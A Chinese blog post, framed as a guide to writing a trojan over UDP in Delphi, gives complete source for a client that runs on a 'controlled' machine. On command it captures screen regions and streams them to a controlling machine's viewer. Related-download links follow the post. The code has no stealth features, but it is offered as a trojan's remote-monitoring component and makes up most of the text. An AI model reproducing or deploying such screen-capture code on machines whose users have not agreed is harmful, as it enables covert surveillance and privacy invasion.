`
xiaofengtoo
  • 浏览: 494029 次
  • 性别: Icon_minigender_1
  • 来自: xiamen
社区版块
存档分类
最新评论

用UDP协议的木马编写方法(Delphi版)

    博客分类:
  • IT
阅读更多

用UDP协议的木马编写方法(Delphi版)  

木马的一个很重要的功能就是远程监视屏幕,下面的文章讲述了怎样利用UDP协议来实现,而不是我们通常用到的tcp/ip协议,很有特色,值得一学。

一、软硬件要求。
Windows95/98对等网,用来监视的计算机(以下简称主控机)和被监视的计算机(以下简称受控机)都必须装有TCP/IP 协议,并正确配置。如没有网络,也可以在一台计算机上进行调试。

二、实现方法。
编制两个应用程序,一个为VClient.exe,装在受控机上,另一个为VServer.exe,装在主控机上。VServer.exe指定要监视的受控机的IP地址和将要在受控机屏幕上抓取区域的大小和位置,并发出屏幕抓取指令给VClient.exe,VClient.exe得到指令后,在受控机屏幕上选取指定区域,生成数据流,将其发回主控机,并在主控机上显示出抓取区域的BMP图象。由以上过程可以看出,该方法的关键有二:一是如何在受控机上进行屏幕抓取,二是如何通过TCP/IP协议在两台计算机中传输数据。

UDP(User Datagram Protocol,意为用户报文协议)是Internet上广泛采用的通信协议之一。与TCP协议不同,它是一种非连接的传输协议,没有确认机制,可靠性不如TCP,但它的效率却比TCP高,用于远程屏幕监视还是比较适合的。同时,UDP控件不区分服务器端和客户端,只区分发送端和接收端,编程上较为简单,故选用UDP协议,使用Delphi 4.0提供的TNMUDP控件。

三、创建演示程序。
第一步,编制VClient.exe文件。新建Delphi工程,将默认窗体的Name属性设为“Client”。加入TNMUDP控件,Name属性设为“CUDP”;LocalPort属性设为“1111”,让控件CUDP监视受控机的1111端口,当有数据发送到该口时,触发控件CUDP的OnDataReceived事件;RemotePort属性设为“2222”,当控件CUDP发送数据时,将数据发到主控机的2222口。

在implementation后面加入变量定义

const BufSize=2048;{ 发送每一笔数据的缓冲区大小 }
var
BmpStream:TMemoryStream;
LeftSize:Longint;{ 发送每一笔数据后剩余的字节数 }

为Client的OnCreate事件添加代码:
procedure TClient.FormCreate(Sender: TObject);
begin
BmpStream:=TMemoryStream.Create;
end;

为Client的OnDestroy事件添加代码:
procedure TClient.FormDestroy(Sender: TObject);
begin
BmpStream.Free;
end;

为控件CUDP的OnDataReceived事件添加代码:
procedure TClient.CUDPDataReceived(Sender: TComponent;
NumberBytes: Integer; FromIP: String);
var
CtrlCode:array[0..29] of char;
Buf:array[0..BufSize-1] of char;
TmpStr:string;
SendSize,LeftPos,TopPos,RightPos,BottomPos:integer;
begin
CUDP.ReadBuffer(CtrlCode,NumberBytes);{ 读取控制码 }
if CtrlCode[0]+CtrlCode[1]+CtrlCode[2]+CtrlCode[3]='show' then
begin { 控制码前4位为“show”表示主控机发出了抓屏指令 }
if BmpStream.Size=0 then { 没有数据可发,必须截屏生成数据 }
begin
TmpStr:=StrPas(CtrlCode);
TmpStr:=Copy(TmpStr,5,Length(TmpStr)-4);
LeftPos:=StrToInt(Copy(TmpStr,1,Pos(':',TmpStr)-1));
TmpStr:=Copy(TmpStr,Pos(':',TmpStr)+1,Length(TmpStr) -Pos(':',TmpStr));
TopPos:=StrToInt(Copy(TmpStr,1,Pos(':',TmpStr)-1));
TmpStr:=Copy(TmpStr,Pos(':',TmpStr)+1,Length(TmpStr)-Pos(':',TmpStr));
RightPos:=StrToInt(Copy(TmpStr,1,Pos(':',TmpStr)-1));
BottomPos:=StrToInt(Copy(TmpStr,Pos(':',TmpStr)+1,Length(TmpStr)-Pos':',TmpStr)));
ScreenCap(LeftPos,TopPos,RightPos,BottomPos); { 截取屏幕 }
end;
if LeftSize>BufSize then SendSize:=BufSize
else SendSize:=LeftSize;
BmpStream.ReadBuffer(Buf,SendSize);
LeftSize:=LeftSize-SendSize;
if LeftSize=0 then BmpStream.Clear;{ 清空流 }
CUDP.RemoteHost:=FromIP; { FromIP为主控机IP地址 }
CUDP.SendBuffer(Buf,SendSize); { 将数据发到主控机的2222口 }
end;
end;

其中ScreenCap是自定义函数,截取屏幕指定区域,
代码如下:
procedure TClient.ScreenCap(LeftPos,TopPos,
RightPos,BottomPos:integer);
var
RectWidth,RectHeight:integer;
SourceDC,DestDC,Bhandle:integer;
Bitmap:TBitmap;
begin
RectWidth:=RightPos-LeftPos;
RectHeight:=BottomPos-TopPos;
SourceDC:=CreateDC('DISPLAY','','',nil);
DestDC:=CreateCompatibleDC(SourceDC);
Bhandle:=CreateCompatibleBitmap(SourceDC,
RectWidth,RectHeight);
SelectObject(DestDC,Bhandle);
BitBlt(DestDC,0,0,RectWidth,RectHeight,SourceDC,
LeftPos,TopPos,SRCCOPY);
Bitmap:=TBitmap.Create;
Bitmap.Handle:=BHandle;
BitMap.SaveToStream(BmpStream);
BmpStream.Position:=0;
LeftSize:=BmpStream.Size;
Bitmap.Free;
DeleteDC(DestDC);
ReleaseDC(Bhandle,SourceDC);
end;
存为“C:\VClient\ClnUnit.pas”和“C:\VClient\VClient.dpr”,
并编译。

第二步,编制VServer.exe文件。
新建Delphi工程,将窗体的Name属性设为“Server”。加入TNMUDP控件,Name属性设为“SUDP”;LocalPort属性设为“2222”,让控件SUDP监视主控机的2222端口,当有数据发送到该口时,触发控件SUDP的OnDataReceived事件;RemotePort属性设为“1111”,当控件SUDP发送数据时,将数据发到受控机的1111口。加入控件Image1,Align属性设为“alClient”;加入控件Button1,Caption属性设为“截屏”;加入控件Label1,Caption属性设为“左:上:右:下”;加入控件Edit1,Text属性设为“0:0:100:100”;加入控件Label2,Caption属性设为“受控机IP地址”;加入控件Edit2,Text属性设为“127.0.0.1”;

在implementation后面加入变量定义
const BufSize=2048;
var
RsltStream,TmpStream:TMemoryStream;

为Server的OnCreate事件添加代码:
procedure TServer.FormCreate(Sender: TObject);
begin
RsltStream:=TMemoryStream.Create;
TmpStream:=TMemoryStream.Create;
end;

为Client的OnDestroy事件添加代码:
procedure TServer.FormDestroy(Sender: TObject);
begin
RsltStream.Free;
TmpStream.Free;
end;

为控件Button1的OnClick事件添加代码:
procedure TServer.Button1Click(Sender: TObject);
var ReqCode:array[0..29] of char;ReqCodeStr:string;
begin
ReqCodeStr:='show'+Edit1.Text;
StrpCopy(ReqCode,ReqCodeStr);
TmpStream.Clear;
RsltStream.Clear;
SUDP.RemoteHost:=Edit2.Text;
SUDP.SendBuffer(ReqCode,30);
end;

为控件SUDP的OnDataReceived事件添加代码:
procedure TServer.SUDPDataReceived(Sender: TComponent;
NumberBytes: Integer; FromIP: String);
var ReqCode:array[0..29] of char;ReqCodeStr:string;
begin
ReqCodeStr:='show'+Edit1.text;
StrpCopy(ReqCode,ReqCodeStr);
SUDP.ReadStream(TmpStream);
RsltStream.CopyFrom(TmpStream,NumberBytes);
if NumberBytes< BufSize then { 数据已读完 }
begin
RsltStream.Position:=0;
Image1.Picture.Bitmap.LoadFromStream(RsltStream);
TmpStream.Clear;
RsltStream.Clear;
end
else
begin
TmpStream.Clear;
ReqCode:='show';
SUDP.RemoteHost:=Edit2.Text;
SUDP.SendBuffer(ReqCode,30);
end;
end;

存为“C:\VServer\SvrUnit.pas”和
“C:\VServer\VServer.dpr”,并编译。
---- 四、测试。

1、本地机测试:在本地机同时运行Vserver.exe和VClient.exe,利用程序的默认设置,即可实现截屏。查看“控制面板”-“网络”-“TCP/IP”-“IP地址”,将程序的“客户IP地址”设为该地址 ,同样正常运行。

2、远程测试:选一台受控机,运行VClient.exe;另选一台主控机,运行VServer.exe,将“受控机IP地址”即Edit2的内容设为受控机的IP地址,“截屏”即可。以上简要介绍了远程屏幕抓取的实现方法,至于在主控机上一屏同时监视多个受控机,读者可自行完善。以上程序,在Windows98对等网、Delphi 4.0下调试通过

分享到:
评论

相关推荐

    基于Delphi的简单udp协议编写

    基于Delphi的简单UDP协议传送数据,数据由服务器端传送到客户端,UDP协议最简单的编写

    UDP协议通信演示Delphi源码

    0-548字节:会完美的展现UDP协议的优势(速度刷刷的)。 大于1472字节以后的话,也可以正常执行。你会见识到什么叫做不可靠的信道(经过测试90%以上还是成功的,只是速度慢了很多)。 数据包大于2K速度明显变慢了;...

    Delphi开发的UDP广播通讯示例

    在Delphi中,我们主要使用TUDPClient和TUDPServer组件来处理UDP通信。TUDPClient用于发送数据,而TUDPServer则用于接收数据。在创建这些组件时,我们需要设置它们的属性,如绑定的IP地址和端口号。 对于UDP广播,...

    UDP打洞原理,Delphi演示

    Delphi程序UDPP2PSer.dpr就是一个简单的例子,展示了如何设置和使用UDP套接字来实现客户端之间的直接通信。 总的来说,UDP打洞是通过公网服务器作为中介,利用特定类型的NAT规则来实现在NAT之后的设备间的直接通信...

    udp聊天 基于UDP协议 java编写

    UDP(User Datagram Protocol)是一种无连接的、不可靠的传输层协议,相比TCP协议,它更注重速度和低延迟,适合于对实时性要求较高的应用,例如在线视频、语音通话和简单聊天应用。在这个基于UDP协议的Java聊天程序...

    在Delphi67中利用UDP协议传送文件的例子

    在Delphi67中利用UDP协议传送文件的例子.rar

    Delphi UDPServer 发送接收16进制数据

    在本文中,我们将深入探讨如何使用Delphi构建一个UDPServer来发送和接收16进制数据。Delphi是一款强大的Windows应用程序开发工具,它提供了丰富的组件库和编程接口,使得网络编程变得相对简单,尤其是UDP(用户数据...

    用Delphi编写局域网中的UDP聊天程序.rar_UDP delphi_delphi udp_lan chat_聊天

    本文将深入探讨如何使用Delphi这一强大的Windows应用程序开发工具来编写一个基于UDP(User Datagram Protocol)的局域网聊天程序。Delphi以其直观的可视化编程界面和强大的VCL组件库,使得开发此类程序变得相对简单...

    indy10 UDP 收发结构体 for Delphi 2010

    Indy10 UDP收发结构体在Delphi 2010中的应用是一个关键的网络通信技术,主要用于构建基于UDP协议的高效、灵活的通信系统。本文将深入探讨 Indy10库如何在Delphi 2010环境中实现UDP通信,并讨论相关的核心结构体及其...

    FPGA实现UDP协议栈,verilog语言附带说明

    总的来说,FPGA实现UDP协议栈是一项复杂的任务,涉及网络协议的理解、硬件描述语言的编程以及测试方法的运用。通过这种方式,我们可以为特定应用定制高效的网络处理硬件,提高数据传输的实时性和效率。

    C++ Builder编写的用UDP协议实现远程监视屏幕

    C++ Builder编写的用UDP协议实现远程监视屏幕,UDP(User Datagram Protocol,意为用户报文协议)是Internet上广泛采用的通信协议之一。与TCP协议不同,它是一种非连接的传输协议,没有确认机制,可靠性不如TCP,但它...

    socket网络(UDP协议编程)

    "socket网络(UDP协议编程)"这个标题明确指出了我们要讨论的核心内容——使用套接字(socket)进行网络编程,并且聚焦在用户数据报协议(UDP)上。UDP是一种无连接的、不可靠的传输层协议,与TCP(传输控制协议)...

    一个使用UDP协议写的围棋

    标题中的“一个使用UDP协议写的围棋”表明这是一个基于UDP(User Datagram Protocol)网络通信协议实现的围棋应用程序。UDP是传输层的一种协议,以其快速、无连接的特点被广泛应用于实时数据交换,如在线游戏、视频...

    用UDP协议实现网络通信C++

    标题 "用UDP协议实现网络通信C++" 涉及的核心知识点主要集中在计算机网络和C++编程语言的应用上。UDP(User Datagram Protocol)是一种无连接的、不可靠的传输层协议,常用于需要快速传输数据但对数据完整性和顺序不...

    UDP.rar_UDP delphi_delphi udp_delphi udp 广播

    UDP(User Datagram Protocol)是因特网协议套件中的传输层协议之一,它与TCP(Transmission Control Protocol)相比,提供了一种无连接、不可靠的数据传输服务。在Delphi编程环境中,开发人员经常使用UDP来构建高效...

    UDP协议的视频图像传输

    为了解决这些问题,本文提出了基于 UDP 协议的视频图像传输方法,扩展了 UDP 协议,定义了包头结构,在发送端对传输进行光滑化处理,在接收端预留一个适当的缓冲区以存储期望包到达之前的数据,添加了流量控制、失序...

    网络协议TCP/IP实验六 UDP 协议分析实验

    ### 知识点一:UDP协议基础 - **定义**:用户数据报协议(User Datagram Protocol,UDP)是一种无连接的传输层协议,提供面向事务的简单不可靠信息传送服务。与TCP相比,UDP不保证数据包的顺序、可靠性或流量控制。...

    基于UDP协议通信的简单客户端/服务器

    基于UDP协议的简单客户端/服务器实现,需要理解UDP协议的基本特性,以及C#中`UdpClient`类的使用方法。通过这种方式,开发者可以构建出适合实时性要求高但对数据可靠性要求不那么严格的网络应用。在实际项目中,还...

    Qt使用udp协议示例,简单易懂

    在这个示例中,我们将深入理解如何在Qt中使用UDP(用户数据报协议)进行通信,特别是通过核心类`QUdpSocket`。 **UDP协议简介** UDP是一种无连接的、不可靠的传输协议,它不保证数据包的顺序、完整性和可靠性,但...

    基于UDP协议的Socket编程

    开发者通过创建`DatagramSocket`实例来建立一个UDP连接,然后使用`send(DatagramPacket packet)`方法发送`DatagramPacket`对象,以及`receive(DatagramPacket packet)`方法接收数据包。`DatagramSocket`提供了监听和...

Global site tag (gtag.js) - Google Analytics